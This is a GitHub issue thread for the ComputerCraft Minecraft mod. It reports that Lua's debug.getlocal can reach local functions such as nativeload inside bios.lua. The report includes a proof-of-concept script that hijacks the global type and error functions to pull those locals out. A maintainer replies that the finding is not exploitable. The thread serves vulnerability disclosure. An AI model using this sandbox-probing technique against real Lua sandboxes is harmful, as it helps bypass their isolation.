debug.getlocal can get locals from bios.lua

Question

debug.getlocal can get locals from bios.lua

KittyCatCode opened this issue 7 years ago · 1 comments

KittyCatCode commented 7 years ago

With the debug library, it's possible to get locals from any function below your function being executed. This affects some local variables in bios.lua because some functions call global, overwritable, functions. Some of the locals in bios expose important functions, like nativeload, nativeget/setfenv, and nativeHTTPRequest. Proof of concept getting nativeload:

local oldT = type
local oldE = error
local function getvarvalue(name)
  local v,f
  local i = 1
  while true do
    local n,va = debug.getlocal(3,i)
    if not n then break end
    if n == name then
      v = va
      f = true
    end
    i = i + 1
  end
  if f then return v end
  local fu = debug.getinfo(3).func
  i = 1
  while true do
    local n, va = debug.getupvalue(fu, i)
    if not n then break end
    if n == name then return va end
    i = i + 1
  end
  return getfenv(fu)[name]
end
local log = fs.open("log", "w")
_G.type = function(a)
  local b = debug.traceback()
  log.writeLine(b)
  if b:find("bios.lua:25:") then
    _G.nativeload = getvarvalue("nativeload")
    log.writeLine("Attempted to get nativeload, stored to global.")
  end
  return oldT(a)
end
_G.error = function(a)
  log.writeLine("ERR: "..a)
  log.writeLine(debug.traceback())
end
pcall(load,9)
_G.error = oldE
_G.type = oldT
log.close()

SquidDev · Answer 1 · 2018-03-23T20:33:53.000Z

Whilst this is technically true, I don't think it's exploitable in any way. Whilst bios.lua includes some implementation-specific code (such as the Lua 5.1/5.2 abstractions), it doesn't expose anything related to the sandbox - that's entirely implemented in Java.

Share to